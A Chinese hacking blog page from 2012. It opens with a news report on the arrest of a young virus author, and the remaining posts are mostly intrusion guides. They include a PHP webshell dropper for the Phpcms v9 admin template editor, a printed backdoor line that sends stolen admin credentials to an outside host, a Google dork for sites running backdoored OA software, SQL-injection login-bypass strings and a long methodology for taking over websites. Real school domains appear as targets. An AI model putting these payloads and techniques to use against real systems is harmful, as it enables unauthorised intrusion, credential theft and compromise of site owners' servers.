“小浩”病毒作者入侵政府网站被通缉拘捕

时间:2012年05月20日作者:微尘评论次数:0

听起来这名字挺熟啊
他仅有初中学历,却在15岁制作出“小浩”病毒,20岁因侵入多个政府网站被通缉
南昌新闻网讯 “我其实是92年的,户口上的年龄是错的。”昨日,在系马桩派出所内,记者看到犯罪嫌疑人邹某,一脸稚嫩,让人无法想象他竟是拥有注册资金上百万的网络公司,却因侵入多个政府官方网站及企业信息系统被公安部门网上通缉的犯罪嫌疑人。
制作病毒攻击竞争对手
侵入多个政府网站
昨日,记者与邹某见面时,他不想多说,并表示他说的大家无法明白。后经民警劝说,才简单道出他之所以被通缉的来龙去脉。
邹某家住西湖区老贡院,去年11月份,他在海南注资一百万元开了网络公司,由于他对网络技术相当娴熟,没干多久,在行业就小有名气。之后,一家网络游戏公司找到他,希望他出手肃清国内其他的游戏私服,并表示事成之后由他来代理该游戏国内的私服。为了垄断行业,他拼命制造病毒攻击其他同行的服务器,2012年1月底,他和3位技术员对江苏常州的多个政府网站及企业信息系统的服务器进行了远程管理软件的植入,被当地公安机关盯上,列入网上通缉。
初中学历堪比高级工程师水平
系马桩派出所民警接到通报后立即对邹某家进行了监控,终于在昨日上午将邹某抓获。在与记者的聊天中,记者得知,邹某家庭条件优越,家里从事网吧生意,他上完初二便辍学了,一直在网吧里玩游戏,后来慢慢对网络技术开始熟悉、了解,当时只有十多岁的邹某竟可轻易对网络游戏进行编程。“我应该算自学成才的。”邹某调侃地说。
后来,记者从江西省互联网协会的专家处获悉,任何一款网络游戏都有制定好的程序密码,要想更改其中的信息要通过繁琐的编程和密码破译,一般网络高级工程师才可能做到这一点。
15岁制作“小浩”病毒
只为证明自己
2007年一个类似“熊猫烧香”的“小浩”蠕虫病毒,引来众多网友的愤怒声讨,也在业内爆发了强烈的反响,制造病毒的15岁少年黑客就是邹某。
邹某说到,事发后他在博客中表示,因能力有限,无法编写专杀程序,只有删除所有相关病毒源代码下载。并坦言不想和“熊猫烧香”作者一样,最终进监狱。可最终他还是被南昌公安机关盯上了,由于当时并未造成很大的损失,加上邹某还未成年,他才幸免入狱。
“为何要制造病毒呢?是不是有经济利益?”记者问道。“不是,和钱没有关系,我只是证明自己的实力,想看下自己的实力到底到了一个什么层次。”邹某回答道。
目前,南昌警方准备将邹某送至江苏,由江苏警方对其进行进一步的调查。(涂细珠 记者 刘星)

夏茂政府网集成OA完整开源版 内置后门

时间:2012年05月20日作者:微尘评论次数:0

文章作者:network

源码下载http://www.mycodes.net/25/2177.htm
后门文件HXINCLUDE/Admin_Upfile.asp
利用方法 你们懂的
谷歌 inurl:a125_news.asp
后门文件下载查看http://115.com/file/anelrzja#Admin-Upfile.asp

Windows 2003 修改默认3389端口方法

时间:2012年05月20日作者:微尘评论次数:0

手动修改注册表修改默认的3389端口,:打开注册表编辑器(在运行中输入:regedit),依次按路径展开;

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp 将PortNumber表值, 选择用十进制方式显示,默认为3389,

修改为需要使用的新端口,修改完成后需要重启修改的端口才能生效。

Phpcms v9后台拿webshell

时间:2012年05月20日作者:微尘评论次数:0

phpcms v9现在安全多了,拿shell确实很麻烦,但无意中还是发现了个漏洞,原来phpcms2008拿shell方法还是很多的,但在v9都用

不了了,但是不知道为啥phpcmcs v9会出现这么低级的漏洞,实在无语了..

操作方法:

进入后台后点击界面–模版风格–随便找个页面点击修改

插入代码后点击提交..

然后回到模版管理找到刚才修改的页面,点击 可视化..

恩,代码执行了

看到这里估计很多人直接崩溃了….很明显的看到phpcms v9后台很注重安全了,但不知道为什么又出现了这种低级的失误.哎..

上个生成代码:

$fp = @fopen(“qing.php”, ‘a’);
@fwrite($fp, ‘<'.'?php'."\r\n\r\n".'eval($_POST[qing])'."\r\n\r\n?".">\r\n”);
@fclose($fp);
?>

一句话地址:http://www.hackqing.com/qing.php 密码 qing

互动百科WIKI某版本被植入窃取帐号密码的后门

时间:2012年05月20日作者:微尘评论次数:0

互动百科WIKI系统特定版本中被恶意置入了后门,用于收集管理员帐号、密码、服务器地址等信息。

互动百科WIKI某版本被植入窃取帐号密码的后门
从官方网站下载的互动百科v5.1 20110927版本文件包中的control/admin_main.php文件被恶意植入后门代码,这段后门代码可以讲管理员的登录帐号、密码、服务器地址等信息发送到一个恶意站点(目前该恶意站点已经无法访问)上,导致网站的私密信息泄露。

修复方案:
删除control/admin_main.php文件中第66行的代码,代码如下:

互动百科WIKI某版本被植入窃取帐号密码的后门
@file_get_contents(‘http://kk.oodnf.com/hdwiki/wk.php?username=’.$this->user['username'].’&password=’.$this->post['password'].’—’.$_SERVER['REMOTE_ADDR'].’—’.date(‘Y-m-d|H:i:s’).’—’.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

或下载新版本,新版本漏洞已经修复

互动百科WIKI某版本被植入窃取帐号密码的后门

美国.英国网站万能密码0day

时间:2012年05月19日作者:微尘评论次数:0

大家都在为这些网站无法下手而烦恼吧?

今天告诉大家一个漏洞

我们国内网站有弱口令,它们也有

此弱口令也就是万能密码

而外国网站的万能密码跟我们的不一样,

首先找到它们的后台

然后
弱口令用户名=’OR’1′= ’1”“密码=’OR’1′= ’1”

并不是所有的都是这样,看你人品跟运气吧

国外0day,让你轻松拿下数据库

时间:2012年05月19日作者:微尘评论次数:0

第一步:我们打开谷歌(当然不要.cn了,香港服务器垃圾,换个jp.或者vn啥的都行)

第二步:搜索关键字i

nurl:/”bigdump.php”
intitle:BigDump ver. 0.29b

土耳其的渗透教程

时间:2012年05月19日作者:微尘评论次数:0

别人那拿来的,但愿你能看懂

http://www.mavi1.org/videolar/joomla.htm

http://www.mavi1.org/videolar/root.htm

http://www.mavi1.org/videolar/2-6-15.htm

http://www.mavi1.org/videolar/2-6-7.htm

http://www.mavi1.org/videolar/2-6-9.htm

http://www.mavi1.org/videolar/aa.htm

http://www.mavi1.org/videolar/arpl.htm

http://www.mavi1.org/videolar/bbbb.htm

http://www.mavi1.org/videolar/brk2.htm

http://www.mavi1.org/videolar/cc.htm

http://www.mavi1.org/videolar/configuration.htm

http://www.mavi1.org/videolar/exp.htm

http://www.mavi1.org/videolar/kbd.htm

http://www.mavi1.org/videolar/kbd_vandal.htm

http://www.mavi1.org/videolar/nuke.htm

http://www.mavi1.org/videolar/passcracks.htm

http://www.mavi1.org/videolar/putty.htm

脚本渗透思路

时间:2012年05月19日作者:微尘评论次数:0

OldJun总结:
1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!

2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就猜数据,从后台下手了,后台可以上传或者改配置文件;

3.asp(aspx)+ACCESS拿shell一般只有3种方法,一是前台上传或者注入进后台上传;二是注入进后台改配置文件;三是注入进后台备份数据库或者暴库后知道是asp或者asa数据库于是直接写一句话;

4.php+MYSQL 一般是注入进后台上传,偶尔运气好些权限够高可以注入select into outfile;然后包含,分本地与远程,远程包含在高版本php是不支持的,于是想办法本地上传图片文件或者写到log里;然后php程序某某未公开的 漏洞,运气好可以直接写shell。
者写到log里;然后php程序某某未公开的 漏洞,运气好可以直接写shell。

5.jsp+MYSQL利用数据库拿权限方面基本同php,而且jsp的上传基本很少检查文件后缀,于是只要有注入点与后台,拿shell相当的容易。jsp+ORACLE的站我碰到的不多,碰到的也是猜出用户名与密码从后台下手的。

6.无论什么大站,主站一般都很安全(不然早被人玩了),于是一般从二级域名下手,猜出主站的某些用户名与密码或者搞到主站的源代码,或者旁注得到同网段服务器后cain或arp。

7.一般的大站很少有用现成的CMS的,于是如果你有幸找到源码,那你就发了,注入漏洞啊,上传漏洞啊,写文件漏洞啊,都掌握在你手里。多看看那些大站新出来的测试分站点,那些站还在测试中,可以很轻松拿下。

8.上传有个文件名截断,这包括2个方面,一是00截断,二是长文件名截断(曾经利用这个搞下hw);然后很多写文件的地方,都可以00,屡试不爽。上传别忘了.asp(当然.asa,.cer,.cdx都可以啦)目录的妙用。
9.php 站无论windows还是linux,都有magic_quotes_gpc的问题,magic_quotes_gpc为on的时候,在server变量 注入的时候还是可以select into outfile,今年我搞过某未开源cms就是这个情况,一般情况下为on就别考虑写文件了,不过有这个权限别忘了读文件源码,因为load_file的 参数是可以编码的。

10.猜路径或者文件在入侵中非常必要,猜不到路径的时候别忘了google(baidu太烂,google很全),于是你可以考虑看站点下的robot.txt或者robots.txt,会有惊喜。

11.工具的使用很重要,入侵之前用WVS扫扫会有助入侵;注入工具虽然很多,但不见得都好使,现在的软硬防火墙、防注入越来越厉害,那时候你就别偷懒,多手工有助你成长。

12.遇到过一流监控么,遇到其他防post的防火墙么,有时候一句话进去了都无法传大马,那时候,你先学学编码,学学变换绕过。

13.想搞一般的小站,记得查看这个小站的版权,找做这个站的公司,然后从这个公司做的其他站下手,得到源码再回头搞,我曾经通过这个方法拿下某知名制药的公司站。

14.旁注的思路永远不过时,遇到dbowner的注入,可以很舒服写shell到你需要的站,省得麻烦的提权了;运气不好,按部就班拿shell提权得到你所需。

15.永远别忘记社会工程学,利用社工把自己当成一个什么也不会的人,从某某站长的qq,身份证,邮箱等等下手,也许有时可能会有意外;另外别忘记admin,admin;test,test;123456,123456这种简单的尝试,当然,你也可以暴力破解。

16.别忽视XSS,别忽视cookie,XSS可以偷cookie,更有若干妙用,自己学会领悟;cookie可以伪造登陆,cookie可以注入,cookie注入可以绕绝大多数的防火墙。

17.平时搞站多多搜集路径啊,源码啊,工具啊,充实自己的“武器”库;最好把自己的入侵步骤记录下来,或者事后反思下,我一般都是记在txt里,另外要做到举一反三。

18.多学习,多看源码,多看公布出来的0day,脚本是入侵的前提,而不是工具,会用工具会装B你还没入门。
——————————————————————————
XXbing总结:
目标:www.***.com
|–探测开放的服务
溢出
弱口令
分析网站目录结构
整站程序Bug 黑白盒测试 获取SHELL
nslookup 列出所有二级玉米 逐个分析
探测弱口令
注入
注入
嗅探+arp
收集一切能收集管理员信息 充分应用baidu google 实现社会工程序
——————————————————————————
冰的原点总结:
1、pangloin对oracle注入点的误报率偏高!

2、SQL语句有时候虽然暴错,我们的语句也有可能成功了!
0判断权限不准确;

4、在PCANYWHERE提权的时候常碰到连上去还要输入WIN密码,网上流传的方法操作起来不切实际,其实连上去就等于拿到系统权限了,大家自己研究,这里提一下;

5、oracle注入不支持多句执行,如update等语句;

6、linx自动攻击器局限性很大,没有手工准确

7、内网渗透时尽量少登录3389,以免被管理员发现;

8、会免杀对渗透来说如虎添翼;

9、如果你想留住这台肉鸡,抓HASH,搞到FTP等信息都是有必要的。

10、社工的力量很强大,真的。
——————————————————————————
某菜鸟总结:
1.上传漏洞[不多讲] pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了! 有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

2.注入漏洞[不多讲] pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令: http://注入网址;update admin set password=’新MD5密码’ where password=’旧MD5密码’– [admin为表名.]

3.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。

4.暴库:把二级目录中间的/换成%5c EY:http://www.ahttc.edu.cn/otherweb … s.asp?BigClassName=职责范围&BigClassType=1 如果你能看到:’

’E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。 这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.

5.’or’ = ‘or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有: ’or’’=’ \” or \”a\”=\”a ’) or (’a’=’a \”) or (\”a\”=\”a or 1=1– ’ or ’a’=’a

6.社会工程学。这个我们都知道吧。就是猜解。 EY:http://www.neu.edu.cn/waishi/admin admin waishi

7.写入ASP格式数据库。就是一句话木马[〈%execute request(\"value\")%〉 ],常用在留言本. EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话木 马

8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改. EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp 这个站用的是:杰出校友录,源码我下过了, 默认数据库/webshell路径:\database\liangu_data.mdb 后台管理:

9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL. /Databackup/dvbbs7.MDB /bbs/Databackup/dvbbs7.MDB /bbs/Data/dvbbs7.MDB /data/dvbbs7.mdb /bbs/diy.asp /diy.asp /bbs/cmd.asp /bbs/cmd.exe /bbs/s-u.exe /bbs/servu.exe 工具:网站猎手 挖掘鸡 EY:http://www.heimian.com/bbs/Databackup/dvbbs7.MDB

10.查看目录法:人一些网站可以断开目录,可以方问目录。 EY:http://www.ujs168.com/shop/admin/ http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/ 这样我们可以找到数据库,下载不用我教吧

11.搜索引擎利用: (1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/ (2).找网站的管理后台地址: site:xxxx.comintext:管理 site:xxxx.comintitle:管理 〈关键字很多,自已找〉 site:xxxx.cominurl:login (3).查找access的数据库,mssql、mysql的连接文件 allinurl:bbsdata filetype:mdbinurl:database filetype:incconn inurl:datafiletype:mdb 我主不做了。。自已做做吧。。

12.旁注,也就是跨站. 我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。

星外主机提权

时间:2012年05月19日作者:微尘评论次数:0

在星外官方上看的

之前发的这个不完整:那个是在T00ls看到的 这个是官网

C:\WINDOWS\TAPI\tsec.ini

360的

C:\Program Files\360\360sd\Section\mutex.db
C:\Program Files\360\360Safe\deepscan\Section\mutex.db
C:\Program Files\360\360Safe\AntiSection\mutex.db

处理办法:直接完全删除360,所有360删除光后留下的文件都要删除

Flash:

C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx

处理办法:直接完全删除(不要保留在回收站),不要在服务器上装Flash组件

IISrewrite3

C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log
C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf
C:\Program Files\Helicon\ISAPI_Rewrite3\error.log

处理办法:将三个文件的权限改成erveryone只读权限(没有写的权限)

DU Meter的流量统计信息日志文件

c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv

处理办法:删除它

诺顿

c:\Program Files\Common Files\Symantec Shared\Persist.bak
c:\Program Files\Common Files\Symantec Shared\Validate.dat
c:\Program Files\Common Files\Symantec Shared\Persist.Dat

处理办法:直接完全删除这个软件

华盾

C:\WINDOWS\hchiblis.ibl

处理办法:直接完全删除这个过滤软件,如果因为别的原因不能删除,可以将权限改成everyone读与写,不能有everyone运行的权限.

一流过滤:

C:\7i24.com\iissafe\log\startandiischeck.txt
C:\7i24.com\iissafe\log\scanlog.htm

如果已经是最新版本的一流(2011-2-19)就不需要处理,如果是旧版本的,要先删除这两个文件,然后再升级一流.正常情况下,这两个文件只有everyone读写的权限(没有运行)

其他有可能提示的文件:

C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\index.dat
C:\WINDOWS\Temp\History\History.IE5\index.dat
C:\WINDOWS\Temp\Cookies\index.dat

检查文件在高级权限管理中,是不是有everyone运行的权限,如果没有,就不用处理,如果有运行的权限要取消运行权限

C:\7i24.com\LinkGate\log\….
C:\7i24.com\LinkGate\log
C:\7i24.com\serverdoctor\log\
C:\7i24.com\serverdoctor\log\….

不需要处理,星外的防盗链,服务器医生等软件默认已自动设置好权限

如果看下这样的提示:
2011-6-8 15:04:50,方法失败,意外错误代码为 32。
这是扫描软盘A:造成的,不用处理

部分zend版本可能有这个提示:

C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll
C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x……

处理办法:将everyone的权限删除,改成adms,system全部权限,users只读权限.

将cscript.exe放到可读写的目录内,然后把iispwd.vbs放在网站根目录内

执行命令:/c “可读写的目录路径\cscript.exe” 网站根目录路径\iispwd.vbs

如:/c “C:\xxx\xxx\xxx\cscript.exe” d:\freehost\xxx\xxx\xxx\iispwd.vbs